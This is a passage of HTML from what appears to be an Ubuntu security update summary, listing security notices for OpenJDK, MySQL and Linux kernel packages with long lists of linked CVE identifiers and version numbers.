<li><a href="https://ubuntu.com/security/CVE-2024-21145">CVE-2024-21145</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-21144">CVE-2024-21144</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-21140">CVE-2024-21140</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-21138">CVE-2024-21138</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-21131">CVE-2024-21131</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Latest upstream releases of OpenJDK 8 and 11</li>
<li>8u422-b05-1,  11.0.24+8</li>
<li>Fixes various issues in the Hotspot and Concurrency components</li>
</ul>
<h3 id="usn-6931-1-usn-6932-1-openjdk-17-and-openjdk-21-vulnerabilities--07-11">[<a href="https://ubuntu.com/security/notices/USN-6931-1">USN-6931-1</a>, <a href="https://ubuntu.com/security/notices/USN-6932-1">USN-6932-1</a>] OpenJDK 17 and OpenJDK 21 vulnerabilities (07:11)</h3>
<ul>
<li>5 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Noble (24.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-21147">CVE-2024-21147</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-21145">CVE-2024-21145</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-21140">CVE-2024-21140</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-21138">CVE-2024-21138</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-21131">CVE-2024-21131</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Latest upstream releases of OpenJDK 17 and 21</li>
<li>17.0.12+7,  21.0.4+7</li>
<li>Fixes the same issues in the Hotspot component</li>
</ul>
<h3 id="usn-6934-1-mysql-vulnerabilities--07-29">[<a href="https://ubuntu.com/security/notices/USN-6934-1">USN-6934-1</a>] MySQL vulnerabilities (07:29)</h3>
<ul>
<li>15 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Noble (24.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-21185">CVE-2024-21185</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-21179">CVE-2024-21179</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-21177">CVE-2024-21177</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-21173">CVE-2024-21173</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-21171">CVE-2024-21171</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-21165">CVE-2024-21165</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-21163">CVE-2024-21163</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-21162">CVE-2024-21162</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-21142">CVE-2024-21142</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-21134">CVE-2024-21134</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-21130">CVE-2024-21130</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-21129">CVE-2024-21129</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-21127">CVE-2024-21127</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-21125">CVE-2024-21125</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-20996">CVE-2024-20996</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Also latest upstream release</li>
<li>8.0.39</li>
<li>Bug fixes, possible new features and incompatible changes - consult release
notes:
<ul>
<li><a href="https://dev.mysql.com/doc/relnotes/mysql/8.0/en/news-8-0-38.html">https://dev.mysql.com/doc/relnotes/mysql/8.0/en/news-8-0-38.html</a></li>
<li><a href="https://dev.mysql.com/doc/relnotes/mysql/8.0/en/news-8-0-39.html">https://dev.mysql.com/doc/relnotes/mysql/8.0/en/news-8-0-39.html</a></li>
<li><a href="https://www.oracle.com/security-alerts/cpujul2024.html">https://www.oracle.com/security-alerts/cpujul2024.html</a></li>
</ul>
</li>
</ul>
<h3 id="usn-6917-1-linux-kernel-vulnerabilities--07-57">[<a href="https://ubuntu.com/security/notices/USN-6917-1">USN-6917-1</a>] Linux kernel vulnerabilities (07:57)</h3>
<ul>
<li>156 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-35933">CVE-2024-35933</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35910">CVE-2024-35910</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27393">CVE-2024-27393</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27004">CVE-2024-27004</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27396">CVE-2024-27396</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36029">CVE-2024-36029</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26955">CVE-2024-26955</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35976">CVE-2024-35976</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26966">CVE-2024-26966</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26811">CVE-2024-26811</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35871">CVE-2024-35871</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52699">CVE-2023-52699</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35796">CVE-2024-35796</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35851">CVE-2024-35851</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35885">CVE-2024-35885</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35813">CVE-2024-35813</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35789">CVE-2024-35789</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35825">CVE-2024-35825</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26994">CVE-2024-26994</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35815">CVE-2024-35815</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27395">CVE-2024-27395</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26981">CVE-2024-26981</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35886">CVE-2024-35886</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26931">CVE-2024-26931</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35791">CVE-2024-35791</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35849">CVE-2024-35849</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35978">CVE-2024-35978</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35895">CVE-2024-35895</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35918">CVE-2024-35918</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35902">CVE-2024-35902</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26926">CVE-2024-26926</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35934">CVE-2024-35934</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35807">CVE-2024-35807</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35805">CVE-2024-35805</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36008">CVE-2024-36008</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26950">CVE-2024-26950</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26973">CVE-2024-26973</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35898">CVE-2024-35898</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35955">CVE-2024-35955</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36004">CVE-2024-36004</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36006">CVE-2024-36006</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35990">CVE-2024-35990</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35944">CVE-2024-35944</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36007">CVE-2024-36007</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35896">CVE-2024-35896</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35819">CVE-2024-35819</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26988">CVE-2024-26988</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35872">CVE-2024-35872</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36025">CVE-2024-36025</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26957">CVE-2024-26957</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35897">CVE-2024-35897</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27016">CVE-2024-27016</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35806">CVE-2024-35806</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35927">CVE-2024-35927</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-48808">CVE-2022-48808</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35960">CVE-2024-35960</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27001">CVE-2024-27001</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35970">CVE-2024-35970</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35988">CVE-2024-35988</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36005">CVE-2024-36005</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35821">CVE-2024-35821</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35925">CVE-2024-35925</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26961">CVE-2024-26961</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35817">CVE-2024-35817</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26922">CVE-2024-26922</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26976">CVE-2024-26976</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35899">CVE-2024-35899</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35984">CVE-2024-35984</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26929">CVE-2024-26929</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27018">CVE-2024-27018</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35907">CVE-2024-35907</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35884">CVE-2024-35884</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52488">CVE-2023-52488</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35982">CVE-2024-35982</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26934">CVE-2024-26934</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26935">CVE-2024-26935</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35973">CVE-2024-35973</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26958">CVE-2024-26958</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27008">CVE-2024-27008</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35809">CVE-2024-35809</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26951">CVE-2024-26951</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35900">CVE-2024-35900</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35888">CVE-2024-35888</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26965">CVE-2024-26965</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26828">CVE-2024-26828</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35935">CVE-2024-35935</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35857">CVE-2024-35857</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26642">CVE-2024-26642</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26989">CVE-2024-26989</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35893">CVE-2024-35893</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35877">CVE-2024-35877</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27009">CVE-2024-27009</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35785">CVE-2024-35785</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35905">CVE-2024-35905</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27020">CVE-2024-27020</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35901">CVE-2024-35901</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26956">CVE-2024-26956</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26977">CVE-2024-26977</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26969">CVE-2024-26969</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26810">CVE-2024-26810</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26813">CVE-2024-26813</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35930">CVE-2024-35930</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26970">CVE-2024-26970</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26687">CVE-2024-26687</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27015">CVE-2024-27015</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35847">CVE-2024-35847</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26999">CVE-2024-26999</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35940">CVE-2024-35940</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35890">CVE-2024-35890</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26814">CVE-2024-26814</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35958">CVE-2024-35958</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35804">CVE-2024-35804</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26629">CVE-2024-26629</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26974">CVE-2024-26974</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52880">CVE-2023-52880</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26937">CVE-2024-26937</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35922">CVE-2024-35922</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35854">CVE-2024-35854</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27013">CVE-2024-27013</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35853">CVE-2024-35853</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27000">CVE-2024-27000</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35989">CVE-2024-35989</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35852">CVE-2024-35852</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35823">CVE-2024-35823</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36020">CVE-2024-36020</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36031">CVE-2024-36031</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26923">CVE-2024-26923</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26654">CVE-2024-26654</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26925">CVE-2024-26925</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35855">CVE-2024-35855</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35997">CVE-2024-35997</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35822">CVE-2024-35822</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27019">CVE-2024-27019</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35938">CVE-2024-35938</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35915">CVE-2024-35915</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35912">CVE-2024-35912</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35936">CVE-2024-35936</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35969">CVE-2024-35969</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27059">CVE-2024-27059</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26964">CVE-2024-26964</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27437">CVE-2024-27437</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26960">CVE-2024-26960</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35950">CVE-2024-35950</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26817">CVE-2024-26817</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26984">CVE-2024-26984</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26812">CVE-2024-26812</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35879">CVE-2024-35879</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26996">CVE-2024-26996</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26993">CVE-2024-26993</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-25739">CVE-2024-25739</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-24861">CVE-2024-24861</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-24859">CVE-2024-24859</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-24858">CVE-2024-24858</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-24857">CVE-2024-24857</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-23307">CVE-2024-23307</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-38096">CVE-2022-38096</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.15 - Azure + FDE (CVM)</li>
</ul>
<h3 id="usn-6918-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6918-1">USN-6918-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>180 CVEs addressed in Noble (24.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-24859">CVE-2024-24859</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-24858">CVE-2024-24858</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-24857">CVE-2024-24857</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35932">CVE-2024-35932</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35937">CVE-2024-35937</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27006">CVE-2024-27006</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35960">CVE-2024-35960</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27011">CVE-2024-27011</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35924">CVE-2024-35924</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35946">CVE-2024-35946</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35942">CVE-2024-35942</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35921">CVE-2024-35921</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35908">CVE-2024-35908</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26811">CVE-2024-26811</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27008">CVE-2024-27008</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35871">CVE-2024-35871</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36019">CVE-2024-36019</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35965">CVE-2024-35965</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35973">CVE-2024-35973</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26981">CVE-2024-26981</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27009">CVE-2024-27009</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27019">CVE-2024-27019</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36022">CVE-2024-36022</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35910">CVE-2024-35910</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35907">CVE-2024-35907</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35860">CVE-2024-35860</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35951">CVE-2024-35951</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26924">CVE-2024-26924</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26921">CVE-2024-26921</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35901">CVE-2024-35901</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35972">CVE-2024-35972</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35889">CVE-2024-35889</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27017">CVE-2024-27017</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35913">CVE-2024-35913</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35936">CVE-2024-35936</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36025">CVE-2024-36025</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35961">CVE-2024-35961</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35977">CVE-2024-35977</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35902">CVE-2024-35902</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26817">CVE-2024-26817</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26994">CVE-2024-26994</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52699">CVE-2023-52699</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35868">CVE-2024-35868</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35899">CVE-2024-35899</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35888">CVE-2024-35888</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26995">CVE-2024-26995</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35865">CVE-2024-35865</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26993">CVE-2024-26993</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35863">CVE-2024-35863</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35970">CVE-2024-35970</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35943">CVE-2024-35943</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35875">CVE-2024-35875</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35978">CVE-2024-35978</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27005">CVE-2024-27005</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35909">CVE-2024-35909</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35957">CVE-2024-35957</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35950">CVE-2024-35950</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26986">CVE-2024-26986</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36020">CVE-2024-36020</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35952">CVE-2024-35952</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26928">CVE-2024-26928</a> <!-- raw HTML omitted --></li>
